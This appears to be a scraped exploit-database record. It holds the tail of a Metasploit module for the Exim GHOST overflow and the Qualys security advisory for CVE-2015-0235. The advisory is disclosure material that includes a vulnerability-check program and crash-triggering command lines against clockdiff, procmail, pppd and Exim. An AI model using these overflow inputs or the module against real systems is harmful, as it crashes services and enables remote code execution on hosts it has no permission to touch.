#{length}\") if length <= 0 \nargument = arg_prefix \ncase arg_pattern \nwhen String \nargument += arg_pattern * (length / arg_pattern.length) \nargument += arg_pattern[0, length % arg_pattern.length] \nwhen Method \nargument += arg_pattern.call(length) \nend \nargument += arg_suffix \nfail_with(\"smtp_send\", \"arglen is #{argument.length}, not #{arg_length}\") if argument.length != arg_length \ncommand = prefix + argument + suffix \nend \n \nfail_with(\"smtp_send\", \"invalid char in cmd\") if command.count(\"^\\x20-\\x7F\") > 0 \nfail_with(\"smtp_send\", \"cmdlen is #{command.length}\") if command.length > SMTP_CMD_BUFFER_SIZE \ncommand += \"\\n\" # RFC says CRLF, but squeeze as many chars as possible in smtp_cmd_buffer \n \n# the following loop works around a bug in the put() method: \n# \"while (send_idx < send_len)\" should be \"while (send_idx < buf.length)\" \n# (or send_idx and/or send_len could be removed altogether, like here) \n \nwhile command and not command.empty? \nnum_sent = sock.put(command) \nfail_with(\"smtp_send\", \"sent is #{num_sent}\") if num_sent <= 0 \nfail_with(\"smtp_send\", \"sent is #{num_sent}, greater than #{command.length}\") if num_sent > command.length \ncommand = command[num_sent..-1] \nend \n \n@smtp_state = :recv \nend \n \ndef smtp_recv(expected_code = nil, expected_data = nil) \nfail_with(\"smtp_recv\", \"state is #{@smtp_state}\") if @smtp_state != :recv \n@smtp_state = :recving \n \nfailure = catch(:failure) do \n \n# parse SMTP replies very carefully (the information \n# leak injects arbitrary data into multiline replies) \n \ndata = \"\" \nwhile data !~ /(\\A|\\r\\n)[0-9]{3}[ ].*\\r\\n\\z/mn \nbegin \nmore_data = sock.get_once \nrescue \nthrow(:failure, \"Caught #{$!.class}: #{$!.message}\") \nend \nthrow(:failure, \"no more data\") if more_data.nil? \nthrow(:failure, \"no more data\") if more_data.empty? \ndata += more_data \nend \n \nthrow(:failure, \"malformed reply (count)\") if data.count(\"\\0\") > 0 \nlines = data.scan(/(?:\\A|\\r\\n)[0-9]{3}[ -].*?(?=\\r\\n(?=[0-9]{3}[ -]|\\z))/mn) \nthrow(:failure, \"malformed reply (empty)\") if lines.empty? \n \ncode = nil \nlines.size.times do |i| \nlines[i].sub!(/\\A\\r\\n/mn, \"\") \nlines[i] += \"\\r\\n\" \n \nif i == 0 \ncode = lines[i][0,3] \nthrow(:failure, \"bad code\") if code !~ /\\A[0-9]{3}\\z/mn \nif expected_code and code !~ /\\A(#{expected_code})\\z/mn \nthrow(:failure, \"unexpected #{code}, expected #{expected_code}\") \nend \nend \n \nline_begins_with = lines[i][0,4] \nline_should_begin_with = code + (i == lines.size-1 ? \" \" : \"-\") \n \nif line_begins_with != line_should_begin_with \nthrow(:failure, \"line begins with #{line_begins_with}, \" \\ \n\"should begin with #{line_should_begin_with}\") \nend \nend \n \nthrow(:failure, \"malformed reply (join)\") if lines.join(\"\") != data \nif expected_data and data !~ /#{expected_data}/mn \nthrow(:failure, \"unexpected data\") \nend \n \nreply = { code: code, lines: lines } \n@smtp_state = :send \nreturn reply \nend \n \nfail_with(\"smtp_recv\", \"#{failure}\") if expected_code \nreturn nil \nend \n \ndef smtp_disconnect \ndisconnect if sock \nfail_with(\"smtp_disconnect\", \"sock isn't nil\") if sock \n@smtp_state = :disconnected \nend \nend \n`\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/130974/exim_gethostbyname_bof.rb.txt"}, {"lastseen": "2016-12-05T22:12:23", "bulletinFamily": "exploit", "description": "", "modified": "2015-01-27T00:00:00", "published": "2015-01-27T00:00:00", "href": "https://packetstormsecurity.com/files/130115/Qualys-Security-Advisory-glibc-gethostbyname-Buffer-Overflow.html", "id": "PACKETSTORM:130115", "type": "packetstorm", "title": "Qualys Security Advisory - glibc gethostbyname Buffer Overflow", "sourceData": "` \nQualys Security Advisory CVE-2015-0235 \n \nGHOST: glibc gethostbyname buffer overflow \n \n \n--[ Contents ]---------------------------------------------------------------- \n \n1 - Summary \n2 - Analysis \n3 - Mitigating factors \n4 - Case studies \n5 - Exploitation \n6 - Acknowledgments \n \n \n--[ 1 - Summary ]------------------------------------------------------------- \n \nDuring a code audit performed internally at Qualys, we discovered a \nbuffer overflow in the __nss_hostname_digits_dots() function of the GNU \nC Library (glibc). This bug is reachable both locally and remotely via \nthe gethostbyname*() functions, so we decided to analyze it -- and its \nimpact -- thoroughly, and named this vulnerability \"GHOST\". \n \nOur main conclusions are: \n \n- Via gethostbyname() or gethostbyname2(), the overflowed buffer is \nlocated in the heap. Via gethostbyname_r() or gethostbyname2_r(), the \noverflowed buffer is caller-supplied (and may therefore be located in \nthe heap, stack, .data, .bss, etc; however, we have seen no such call \nin practice). \n \n- At most sizeof(char *) bytes can be overwritten (ie, 4 bytes on 32-bit \nmachines, and 8 bytes on 64-bit machines). Bytes can be overwritten \nonly with digits ('0'...'9'), dots ('.'), and a terminating null \ncharacter ('\\0'). \n \n- Despite these limitations, arbitrary code execution can be achieved. \nAs a proof of concept, we developed a full-fledged remote exploit \nagainst the Exim mail server, bypassing all existing protections \n(ASLR, PIE, and NX) on both 32-bit and 64-bit machines. We will \npublish our exploit as a Metasploit module in the near future. \n \n- The first vulnerable version of the GNU C Library is glibc-2.2, \nreleased on November 10, 2000. \n \n- We identified a number of factors that mitigate the impact of this \nbug. In particular, we discovered that it was fixed on May 21, 2013 \n(between the releases of glibc-2.17 and glibc-2.18). Unfortunately, it \nwas not recognized as a security threat; as a result, most stable and \nlong-term-support distributions were left exposed (and still are): \nDebian 7 (wheezy), Red Hat Enterprise Linux 6 & 7, CentOS 6 & 7, \nUbuntu 12.04, for example. \n \n \n--[ 2 - Analysis ]------------------------------------------------------------ \n \nThe vulnerable function, __nss_hostname_digits_dots(), is called \ninternally by the glibc in nss/getXXbyYY.c (the non-reentrant version) \nand nss/getXXbyYY_r.c (the reentrant version). However, the calls are \nsurrounded by #ifdef HANDLE_DIGITS_DOTS, a macro defined only in: \n \n- inet/gethstbynm.c \n- inet/gethstbynm2.c \n- inet/gethstbynm_r.c \n- inet/gethstbynm2_r.c \n- nscd/gethstbynm3_r.c \n \nThese files implement the gethostbyname*() family, and hence the only \nway to reach __nss_hostname_digits_dots() and its buffer overflow. The \npurpose of this function is to avoid expensive DNS lookups if the \nhostname argument is already an IPv4 or IPv6 address. \n \nThe code below comes from glibc-2.17: \n \n35 int \n36 __nss_hostname_digits_dots (const char *name, struct hostent *resbuf, \n37 char **buffer, size_t *buffer_size, \n38 size_t buflen, struct hostent **result, \n39 enum nss_status *status, int af, int *h_errnop) \n40 { \n.. \n57 if (isdigit (name[0]) || isxdigit (name[0]) || name[0] == ':') \n58 { \n59 const char *cp; \n60 char *hostname; \n61 typedef unsigned char host_addr_t[16]; \n62 host_addr_t *host_addr; \n63 typedef char *host_addr_list_t[2]; \n64 host_addr_list_t *h_addr_ptrs; \n65 char **h_alias_ptr; \n66 size_t size_needed; \n.. \n85 size_needed = (sizeof (*host_addr) \n86 + sizeof (*h_addr_ptrs) + strlen (name) + 1); \n87 \n88 if (buffer_size == NULL) \n89 { \n90 if (buflen < size_needed) \n91 { \n.. \n95 goto done; \n96 } \n97 } \n98 else if (buffer_size != NULL && *buffer_size < size_needed) \n99 { \n100 char *new_buf; \n101 *buffer_size = size_needed; \n102 new_buf = (char *) realloc (*buffer, *buffer_size); \n103 \n104 if (new_buf == NULL) \n105 { \n... \n114 goto done; \n115 } \n116 *buffer = new_buf; \n117 } \n... \n121 host_addr = (host_addr_t *) *buffer; \n122 h_addr_ptrs = (host_addr_list_t *) \n123 ((char *) host_addr + sizeof (*host_addr)); \n124 h_alias_ptr = (char **) ((char *) h_addr_ptrs + sizeof (*h_addr_ptrs)); \n125 hostname = (char *) h_alias_ptr + sizeof (*h_alias_ptr); \n126 \n127 if (isdigit (name[0])) \n128 { \n129 for (cp = name;; ++cp) \n130 { \n131 if (*cp == '\\0') \n132 { \n133 int ok; \n134 \n135 if (*--cp == '.') \n136 break; \n... \n142 if (af == AF_INET) \n143 ok = __inet_aton (name, (struct in_addr *) host_addr); \n144 else \n145 { \n146 assert (af == AF_INET6); \n147 ok = inet_pton (af, name, host_addr) > 0; \n148 } \n149 if (! ok) \n150 { \n... \n154 goto done; \n155 } \n156 \n157 resbuf->h_name = strcpy (hostname, name); \n... \n194 goto done; \n195 } \n196 \n197 if (!isdigit (*cp) && *cp != '.') \n198 break; \n199 } \n200 } \n... \n \nLines 85-86 compute the size_needed to store three (3) distinct entities \nin buffer: host_addr, h_addr_ptrs, and name (the hostname). Lines 88-117 \nmake sure the buffer is large enough: lines 88-97 correspond to the \nreentrant case, lines 98-117 to the non-reentrant case. \n \nLines 121-125 prepare pointers to store four (4) distinct entities in \nbuffer: host_addr, h_addr_ptrs, h_alias_ptr, and hostname. The sizeof \n(*h_alias_ptr) -- the size of a char pointer -- is missing from the \ncomputation of size_needed. \n \nThe strcpy() on line 157 should therefore allow us to write past the end \nof buffer, at most (depending on strlen(name) and alignment) 4 bytes on \n32-bit machines, or 8 bytes on 64-bit machines. There is a similar \nstrcpy() after line 200, but no buffer overflow: \n \n236 size_needed = (sizeof (*host_addr) \n237 + sizeof (*h_addr_ptrs) + strlen (name) + 1); \n... \n267 host_addr = (host_addr_t *) *buffer; \n268 h_addr_ptrs = (host_addr_list_t *) \n269 ((char *) host_addr + sizeof (*host_addr)); \n270 hostname = (char *) h_addr_ptrs + sizeof (*h_addr_ptrs); \n... \n289 resbuf->h_name = strcpy (hostname, name); \n \nIn order to reach the overflow at line 157, the hostname argument must \nmeet the following requirements: \n \n- Its first character must be a digit (line 127). \n \n- Its last character must not be a dot (line 135). \n \n- It must comprise only digits and dots (line 197) (we call this the \n\"digits-and-dots\" requirement). \n \n- It must be long enough to overflow the buffer. For example, the \nnon-reentrant gethostbyname*() functions initially allocate their \nbuffer with a call to malloc(1024) (the \"1-KB\" requirement). \n \n- It must be successfully parsed as an IPv4 address by inet_aton() (line \n143), or as an IPv6 address by inet_pton() (line 147). Upon careful \nanalysis of these two functions, we can further refine this \n\"inet-aton\" requirement: \n \n. It is impossible to successfully parse a \"digits-and-dots\" hostname \nas an IPv6 address with inet_pton() (':' is forbidden). Hence it is \nimpossible to reach the overflow with calls to gethostbyname2() or \ngethostbyname2_r() if the address family argument is AF_INET6. \n \n. Conclusion: inet_aton() is the only option, and the hostname must \nhave one of the following forms: \"a.b.c.d\", \"a.b.c\", \"a.b\", or \"a\", \nwhere a, b, c, d must be unsigned integers, at most 0xfffffffful, \nconverted successfully (ie, no integer overflow) by strtoul() in \ndecimal or octal (but not hexadecimal, because 'x' and 'X' are \nforbidden). \n \n \n--[ 3 - Mitigating factors ]-------------------------------------------------- \n \nThe impact of this bug is reduced significantly by the following \nreasons: \n \n- A patch already exists (since May 21, 2013), and has been applied and \ntested since glibc-2.18, released on August 12, 2013: \n \n[BZ #15014] \n* nss/getXXbyYY_r.c (INTERNAL (REENTRANT_NAME)) \n[HANDLE_DIGITS_DOTS]: Set any_service when digits-dots parsing was \nsuccessful. \n* nss/digits_dots.c (__nss_hostname_digits_dots): Remove \nredundant variable declarations and reallocation of buffer when \nparsing as IPv6 address. Always set NSS status when called from \nreentrant functions. Use NETDB_INTERNAL instead of TRY_AGAIN when \nbuffer too small. Correct computation of needed size. \n* nss/Makefile (tests): Add test-digits-dots. \n* nss/test-digits-dots.c: New test. \n \n- The gethostbyname*() functions are obsolete; with the advent of IPv6, \nrecent applications use getaddrinfo() instead. \n \n- Many programs, especially SUID binaries reachable locally, use \ngethostbyname() if, and only if, a preliminary call to inet_aton() \nfails. However, a subsequent call must also succeed (the \"inet-aton\" \nrequirement) in order to reach the overflow: this is impossible, and \nsuch programs are therefore safe. \n \n- Most of the other programs, especially servers reachable remotely, use \ngethostbyname() to perform forward-confirmed reverse DNS (FCrDNS, also \nknown as full-circle reverse DNS) checks. These programs are generally \nsafe, because the hostname passed to gethostbyname() has normally been \npre-validated by DNS software: \n \n. \"a string of labels each containing up to 63 8-bit octets, separated \nby dots, and with a maximum total of 255 octets.\" This makes it \nimpossible to satisfy the \"1-KB\" requirement. \n \n. Actually, glibc's DNS resolver can produce hostnames of up to \n(almost) 1025 characters (in case of bit-string labels, and special \nor non-printable characters). But this introduces backslashes ('\\\\') \nand makes it impossible to satisfy the \"digits-and-dots\" \nrequirement. \n \n \n--[ 4 - Case studies ]-------------------------------------------------------- \n \nIn this section, we will analyze real-world examples of programs that \ncall the gethostbyname*() functions, but we first introduce a small test \nprogram that checks whether a system is vulnerable or not: \n \n[user@fedora-19 ~]$ cat > GHOST.c << EOF \n#include <netdb.h> \n#include <stdio.h> \n#include <stdlib.h> \n#include <string.h> \n#include <errno.h> \n \n#define CANARY \"in_the_coal_mine\" \n \nstruct { \nchar buffer[1024]; \nchar canary[sizeof(CANARY)]; \n} temp = { \"buffer\", CANARY }; \n \nint main(void) { \nstruct hostent resbuf; \nstruct hostent *result; \nint herrno; \nint retval; \n \n/*** strlen (name) = size_needed - sizeof (*host_addr) - sizeof (*h_addr_ptrs) - 1; ***/ \nsize_t len = sizeof(temp.buffer) - 16*sizeof(unsigned char) - 2*sizeof(char *) - 1; \nchar name[sizeof(temp.buffer)]; \nmemset(name, '0', len); \nname[len] = '\\0'; \n \nretval = gethostbyname_r(name, &resbuf, temp.buffer, sizeof(temp.buffer), &result, &herrno); \n \nif (strcmp(temp.canary, CANARY) != 0) { \nputs(\"vulnerable\"); \nexit(EXIT_SUCCESS); \n} \nif (retval == ERANGE) { \nputs(\"not vulnerable\"); \nexit(EXIT_SUCCESS); \n} \nputs(\"should not happen\"); \nexit(EXIT_FAILURE); \n} \nEOF \n \n[user@fedora-19 ~]$ gcc GHOST.c -o GHOST \n \nOn Fedora 19 (glibc-2.17): \n \n[user@fedora-19 ~]$ ./GHOST \nvulnerable \n \nOn Fedora 20 (glibc-2.18): \n \n[user@fedora-20 ~]$ ./GHOST \nnot vulnerable \n \n----[ 4.1 - The GNU C Library ]----------------------------------------------- \n \nThe glibc itself contains a few calls to gethostbyname*() functions. In \nparticular, getaddrinfo() calls gethostbyname2_r() if, but only if, a \nfirst call to inet_aton() fails: in accordance with the \"inet-aton\" \nrequirement, these internal calls are safe. For example, \neglibc-2.13/sysdeps/posix/getaddrinfo.c: \n \nat->family = AF_UNSPEC; \n... \nif (__inet_aton (name, (struct in_addr *) at->addr) != 0) \n{ \nif (req->ai_family == AF_UNSPEC || req->ai_family == AF_INET) \nat->family = AF_INET; \nelse if (req->ai_family == AF_INET6 && (req->ai_flags & AI_V4MAPPED)) \n{ \n... \nat->family = AF_INET6; \n} \nelse \nreturn -EAI_ADDRFAMILY; \n... \n} \n... \nif (at->family == AF_UNSPEC && (req->ai_flags & AI_NUMERICHOST) == 0) \n{ \n... \nsize_t tmpbuflen = 512; \nchar *tmpbuf = alloca (tmpbuflen); \n... \nrc = __gethostbyname2_r (name, family, &th, tmpbuf, \ntmpbuflen, &h, &herrno); \n... \n} \n \n----[ 4.2 - mount.nfs ]------------------------------------------------------- \n \nSimilarly, mount.nfs (a SUID-root binary) is not vulnerable: \n \nif (inet_aton(hostname, &addr->sin_addr)) \nreturn 0; \nif ((hp = gethostbyname(hostname)) == NULL) { \nnfs_error(_(\"%s: can't get address for %s\\n\"), \nprogname, hostname); \nreturn -1; \n} \n \n----[ 4.3 - mtr ]------------------------------------------------------------- \n \nmtr (another SUID-root binary) is not vulnerable either, because it \ncalls getaddrinfo() instead of gethostbyname*() functions on any modern \n(ie, IPv6-enabled) system: \n \n#ifdef ENABLE_IPV6 \n/* gethostbyname2() is deprecated so we'll use getaddrinfo() instead. */ \n... \nerror = getaddrinfo( Hostname, NULL, &hints, &res ); \nif ( error ) { \nif (error == EAI_SYSTEM) \nperror (\"Failed to resolve host\"); \nelse \nfprintf (stderr, \"Failed to resolve host: %s\\n\", gai_strerror(error)); \nexit( EXIT_FAILURE ); \n} \n... \n#else \nhost = gethostbyname(Hostname); \nif (host == NULL) { \nherror(\"mtr gethostbyname\"); \nexit(1); \n} \n... \n#endif \n \n----[ 4.4 - iputils ]--------------------------------------------------------- \n \n------[ 4.4.1 - clockdiff ]--------------------------------------------------- \n \nclockdiff is vulnerable in a straightforward manner: \n \nhp = gethostbyname(argv[1]); \nif (hp == NULL) { \nfprintf(stderr, \"clockdiff: %s: host not found\\n\", argv[1]); \nexit(1); \n} \n \n[user@fedora-19-32b ~]$ ls -l /usr/sbin/clockdiff \n-rwxr-xr-x. 1 root root 15076 Feb 1 2013 /usr/sbin/clockdiff \n \n[user@fedora-19-32b ~]$ getcap /usr/sbin/clockdiff \n/usr/sbin/clockdiff = cap_net_raw+ep \n \n[user@fedora-19-32b ~]$ /usr/sbin/clockdiff `python -c \"print '0' * $((0x10000-16*1-2*4-1-4))\"` \n.Segmentation fault \n \n[user@fedora-19-32b ~]$ /usr/sbin/clockdiff `python -c \"print '0' * $((0x20000-16*1-2*4-1-4))\"` \nSegmentation fault \n \n[user@fedora-19-32b ~]$ dmesg \n... \n[202071.118929] clockdiff[3610]: segfault at b86711f4 ip b75de0c6 sp bfc191f0 error 6 in libc-2.17.so[b7567000+1b8000] \n[202086.144336] clockdiff[3618]: segfault at b90d0d24 ip b75bb0c6 sp bf8e9dc0 error 6 in libc-2.17.so[b7544000+1b8000] \n \n------[ 4.4.2 - ping and arping ]--------------------------------------------- \n \nping and arping call gethostbyname() and gethostbyname2(), respectively, \nif and only if inet_aton() fails first. This time, however, there is \nanother function call in between (Fedora, for example, does define \nUSE_IDN): \n \n--------[ 4.4.2.1 - ping ]---------------------------------------------------- \n \nif (inet_aton(target, &whereto.sin_addr) == 1) { \n... \n} else { \nchar *idn; \n#ifdef USE_IDN \nint rc; \n... \nrc = idna_to_ascii_lz(target, &idn, 0); \nif (rc != IDNA_SUCCESS) { \nfprintf(stderr, \"ping: IDN encoding failed: %s\\n\", idna_strerror(rc)); \nexit(2); \n} \n#else \nidn = target; \n#endif \nhp = gethostbyname(idn); \n \n--------[ 4.4.2.2 - arping ]-------------------------------------------------- \n \nif (inet_aton(target, &dst) != 1) { \nstruct hostent *hp; \nchar *idn = target; \n#ifdef USE_IDN \nint rc; \n \nrc = idna_to_ascii_lz(target, &idn, 0); \n \nif (rc != IDNA_SUCCESS) { \nfprintf(stderr, \"arping: IDN encoding failed: %s\\n\", idna_strerror(rc)); \nexit(2); \n} \n#endif \n \nhp = gethostbyname2(idn, AF_INET); \n \n--------[ 4.4.2.3 - Analysis ]------------------------------------------------ \n \nIf idna_to_ascii_lz() modifies the target hostname, the first call to \ninet_aton() could fail and the second call (internal to gethostbyname()) \ncould succeed. For example, idna_to_ascii_lz() transforms any Unicode \ndot-like character (0x3002, 0xFF0E, 0xFF61) into an ASCII dot (\".\"). \n \nBut it also restricts the length of a domain label to 63 characters: \nthis makes it impossible to reach 1024 bytes (the \"1-KB\" requirement) \nwith only 4 labels and 3 dots (the \"inet-aton\" requirement). \n \nUnless inet_aton() (actually, strtoul()) can be tricked into accepting \nmore than 3 dots? Indeed, idna_to_ascii_lz() does not restrict the total \nlength of a domain name. glibc supports \"thousands' grouping characters\" \n(man 3 printf); for example, sscanf(str, \"%'lu\", &ul) yields 1000 when \nprocessing any of the following input strings: \n \n- \"1,000\" in an English locale; \n- \"1 000\" in a French locale; and \n- \"1.000\" in a German or Spanish locale. \n \nstrtoul() implements this \"number grouping\" too, but its use is limited \nto internal glibc functions. Conclusion: more than 3 dots is impossible, \nand neither ping nor arping is vulnerable. \n \n----[ 4.5 - procmail ]-------------------------------------------------------- \n \nprocmail (a SUID-root and SGID-mail binary) is vulnerable through its \n\"comsat/biff\" feature: \n \n#define COMSAThost \"localhost\" /* where the biff/comsat daemon lives */ \n... \n#define SERV_ADDRsep '@' /* when overriding in COMSAT=serv@addr */ \n \nint setcomsat(chp)const char*chp; \n{ char*chad; ... \nchad=strchr(chp,SERV_ADDRsep); /* @ separator? */ \n... \nif(chad) \n*chad++='\\0'; /* split the specifier */ \nif(!chad||!*chad) /* no host */ \n#ifndef IP_localhost /* Is \"localhost\" preresolved? */ \nchad=COMSAThost; /* nope, use default */ \n#else /* IP_localhost */ \n{ ... \n} \nelse \n#endif /* IP_localhost */ \n{ ... \nif(!(host=gethostbyname(chad))||!host->h_0addr_list) \n \nuser@debian-7-2-32b:~$ ls -l /usr/bin/procmail \n-rwsr-sr-x 1 root mail 83912 Jun 6 2012 /usr/bin/procmail \n \nuser@debian-7-2-32b:~$ /usr/bin/procmail 'VERBOSE=on' 'COMSAT=@'`python -c \"print '0' * $((0x500-16*1-2*4-1-4))\"` < /dev/null \n... \n*** glibc detected *** /usr/bin/procmail: free(): invalid next size (normal): 0x0980de30 *** \n======= Backtrace: ========= \n/lib/i386-linux-gnu/i686/cmov/libc.so.6(+0x70f01)[0xb76b2f01] \n/lib/i386-linux-gnu/i686/cmov/libc.so.6(+0x72768)[0xb76b4768] \n/lib/i386-linux-gnu/i686/cmov/libc.so.6(cfree+0x6d)[0xb76b781d] \n/usr/bin/procmail[0x80548ec] \n/lib/i386-linux-gnu/i686/cmov/libc.so.6(__libc_start_main+0xe6)[0xb7658e46] \n/usr/bin/procmail[0x804bb55] \n======= Memory map: ======== \n... \n0980a000-0982b000 rw-p 00000000 00:00 0 [heap] \n... \nAborted \n \nuser@debian-7-2-32b:~$ _COMSAT_='COMSAT=@'`python -c \"print '0' * $((0x500-16*1-2*4-1-4))\"` \n \nuser@debian-7-2-32b:~$ /usr/bin/procmail \"$_COMSAT_\" \"$_COMSAT_\"1234 < /dev/null \nSegmentation fault \n \nuser@debian-7-2-32b:~$ /usr/bin/procmail \"$_COMSAT_\"12345670 \"$_COMSAT_\"123456701234 < /dev/null \nSegmentation fault \n \nuser@debian-7-2-32b:~$ dmesg \n... \n[211409.564917] procmail[4549]: segfault at c ip b768e5a4 sp bfcb53d8 error 4 in libc-2.13.so[b761c000+15c000] \n[211495.820710] procmail[4559]: segfault at b8cb290c ip b763c5a4 sp bf870c98 error 4 in libc-2.13.so[b75ca000+15c000] \n \n----[ 4.6 - pppd ]------------------------------------------------------------ \n \npppd (yet another SUID-root binary) calls gethostbyname() if a \npreliminary call to inet_addr() (a simple wrapper around inet_aton()) \nfails. \"The inet_addr() function converts the Internet host address cp \nfrom IPv4 numbers-and-dots notation into binary data in network byte \norder. If the input is invalid, INADDR_NONE (usually -1) is returned. \nUse of this function is problematic because -1 is a valid address \n(255.255.255.255).\" A failure for inet_addr(), but a success for \ninet_aton(), and consequently a path to the buffer overflow. \n \nuser@ubuntu-12-04-32b:~$ ls -l /usr/sbin/pppd \n-rwsr-xr-- 1 root dip 273272 Feb 3 2011 /usr/sbin/pppd \n \nuser@ubuntu-12-04-32b:~$ id \nuid=1000(user) gid=1000(user) groups=1000(user),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev) \n \n------[ 4.6.1 - ms-dns option ]----------------------------------------------- \n \nstatic int \nsetdnsaddr(argv) \nchar **argv; \n{ \nu_int32_t dns; \nstruct hostent *hp; \n \ndns = inet_addr(*argv); \nif (dns == (u_int32_t) -1) { \nif ((hp = gethostbyname(*argv)) == NULL) { \noption_error(\"invalid address parameter '%s' for ms-dns option\", \n*argv); \nreturn 0; \n} \ndns = *(u_int32_t *)hp->h_addr; \n} \n \nuser@ubuntu-12-04-32b:~$ /usr/sbin/pppd 'dryrun' 'ms-dns' `python -c \"print '0' * $((0x1000-16*1-2*4-16-4))\"`'377.255.255.255' \n*** glibc detected *** /usr/sbin/pppd: free(): invalid next size (normal): 0x09c0f928 *** \n======= Backtrace: ========= \n/lib/i386-linux-gnu/libc.so.6(+0x75ee2)[0xb75e1ee2] \n/lib/i386-linux-gnu/libc.so.6(+0x65db5)[0xb75d1db5] \n/lib/i386-linux-gnu/libc.so.6(fopen+0x2b)[0xb75d1deb] \n/usr/sbin/pppd(options_from_file+0xa8)[0x8064948] \n/usr/sbin/pppd(options_for_tty+0xde)[0x8064d7e] \n/usr/sbin/pppd(tty_process_extra_options+0xa4)[0x806e1a4] \n/usr/sbin/pppd(main+0x1cf)[0x8050b2f] \n/lib/i386-linux-gnu/libc.so.6(__libc_start_main+0xf3)[0xb75854d3] \n======= Memory map: ======== \n... \n09c0c000-09c2d000 rw-p 00000000 00:00 0 [heap] \n... \nAborted (core dumped) \n \n------[ 4.6.2 - ms-wins option ]---------------------------------------------- \n \nstatic int \nsetwinsaddr(argv) \nchar **argv; \n{ \nu_int32_t wins; \nstruct hostent *hp; \n \nwins = inet_addr(*argv); \nif (wins == (u_int32_t) -1) { \nif ((hp = gethostbyname(*argv)) == NULL) { \noption_error(\"invalid address parameter '%s' for ms-wins option\", \n*argv); \nreturn 0; \n} \nwins = *(u_int32_t *)hp->h_addr; \n} \n \nuser@ubuntu-12-04-32b:~$ /usr/sbin/pppd 'dryrun' 'ms-wins' `python -c \"print '0' * $((0x1000-16*1-2*4-16-4))\"`'377.255.255.255' \n*** glibc detected *** /usr/sbin/pppd: free(): invalid next size (normal): 0x08a64928 *** \n======= Backtrace: ========= \n/lib/i386-linux-gnu/libc.so.6(+0x75ee2)[0xb757aee2] \n/lib/i386-linux-gnu/libc.so.6(+0x65db5)[0xb756adb5] \n/lib/i386-linux-gnu/libc.so.6(fopen+0x2b)[0xb756adeb] \n/usr/sbin/pppd(options_from_file+0xa8)[0x8064948] \n/usr/sbin/pppd(options_for_tty+0xde)[0x8064d7e] \n/usr/sbin/pppd(tty_process_extra_options+0xa4)[0x806e1a4] \n/usr/sbin/pppd(main+0x1cf)[0x8050b2f] \n/lib/i386-linux-gnu/libc.so.6(__libc_start_main+0xf3)[0xb751e4d3] \n======= Memory map: ======== \n... \n08a61000-08a82000 rw-p 00000000 00:00 0 [heap] \n... \nAborted (core dumped) \n \n------[ 4.6.3 - socket option ]----------------------------------------------- \n \nstatic int \nopen_socket(dest) \nchar *dest; \n{ \nchar *sep, *endp = NULL; \nint sock, port = -1; \nu_int32_t host; \nstruct hostent *hent; \n... \nsep = strchr(dest, ':'); \nif (sep != NULL) \nport = strtol(sep+1, &endp, 10); \nif (port < 0 || endp == sep+1 || sep == dest) { \nerror(\"Can't parse host:port for socket destination\"); \nreturn -1; \n} \n*sep = 0; \nhost = inet_addr(dest); \nif (host == (u_int32_t) -1) { \nhent = gethostbyname(dest); \nif (hent == NULL) { \nerror(\"%s: unknown host in socket option\", dest); \n*sep = ':'; \nreturn -1; \n} \nhost = *(u_int32_t *)(hent->h_addr_list[0]); \n} \n \nuser@ubuntu-12-04-32b:~$ /usr/sbin/pppd 'socket' `python -c \"print '0' * $((0x1000-16*1-2*4-16-4))\"`'377.255.255.255:1' \nuser@ubuntu-12-04-32b:~$ *** glibc detected *** /usr/sbin/pppd: malloc(): memory corruption: 0x09cce270 *** \n \n----[ 4.7 - Exim ]------------------------------------------------------------ \n \nThe Exim mail server is exploitable remotely if configured to perform \nextra security checks on the HELO and EHLO commands (\"helo_verify_hosts\" \nor \"helo_try_verify_hosts\" option, or \"verify = helo\" ACL); we developed \na reliable and fully-functional exploit that bypasses all existing \nprotections (ASLR, PIE, NX) on 32-bit and 64-bit machines. \n \nuser@debian-7-7-64b:~$ grep helo /var/lib/exim4/config.autogenerated | grep verify \nhelo_verify_hosts = * \n \nuser@debian-7-7-64b:~$ python -c \"print '0' * $((0x500-16*1-2*8-1-8))\" \n000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 \n \nuser@debian-7-7-64b:~$ telnet 127.0.0.1 25 \nTrying 127.0.0.1... \nConnected to 127.0.0.1. \nEscape character is '^]'. \n220 debian-7-7-64b ESMTP Exim 4.80 ... \nHELO 000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 \nConnection closed by foreign host. \n \nuser@debian-7-7-64b:~$ dmesg \n... \n[ 1715.842547] exim4[2562]: segfault at 7fabf1f0ecb8 ip 00007fabef31bd04 sp 00007fffb427d5b0 error 6 in libc-2.13.so[7fabef2a2000+182000] \n \n \n--[ 5 - Exploitation ]-------------------------------------------------------- \n \n----[ 5.1 - Code execution ]-------------------------------------------------- \n \nIn this section, we describe how we achieve remote code execution \nagainst the Exim SMTP mail server, bypassing the NX (No-eXecute) \nprotection and glibc's 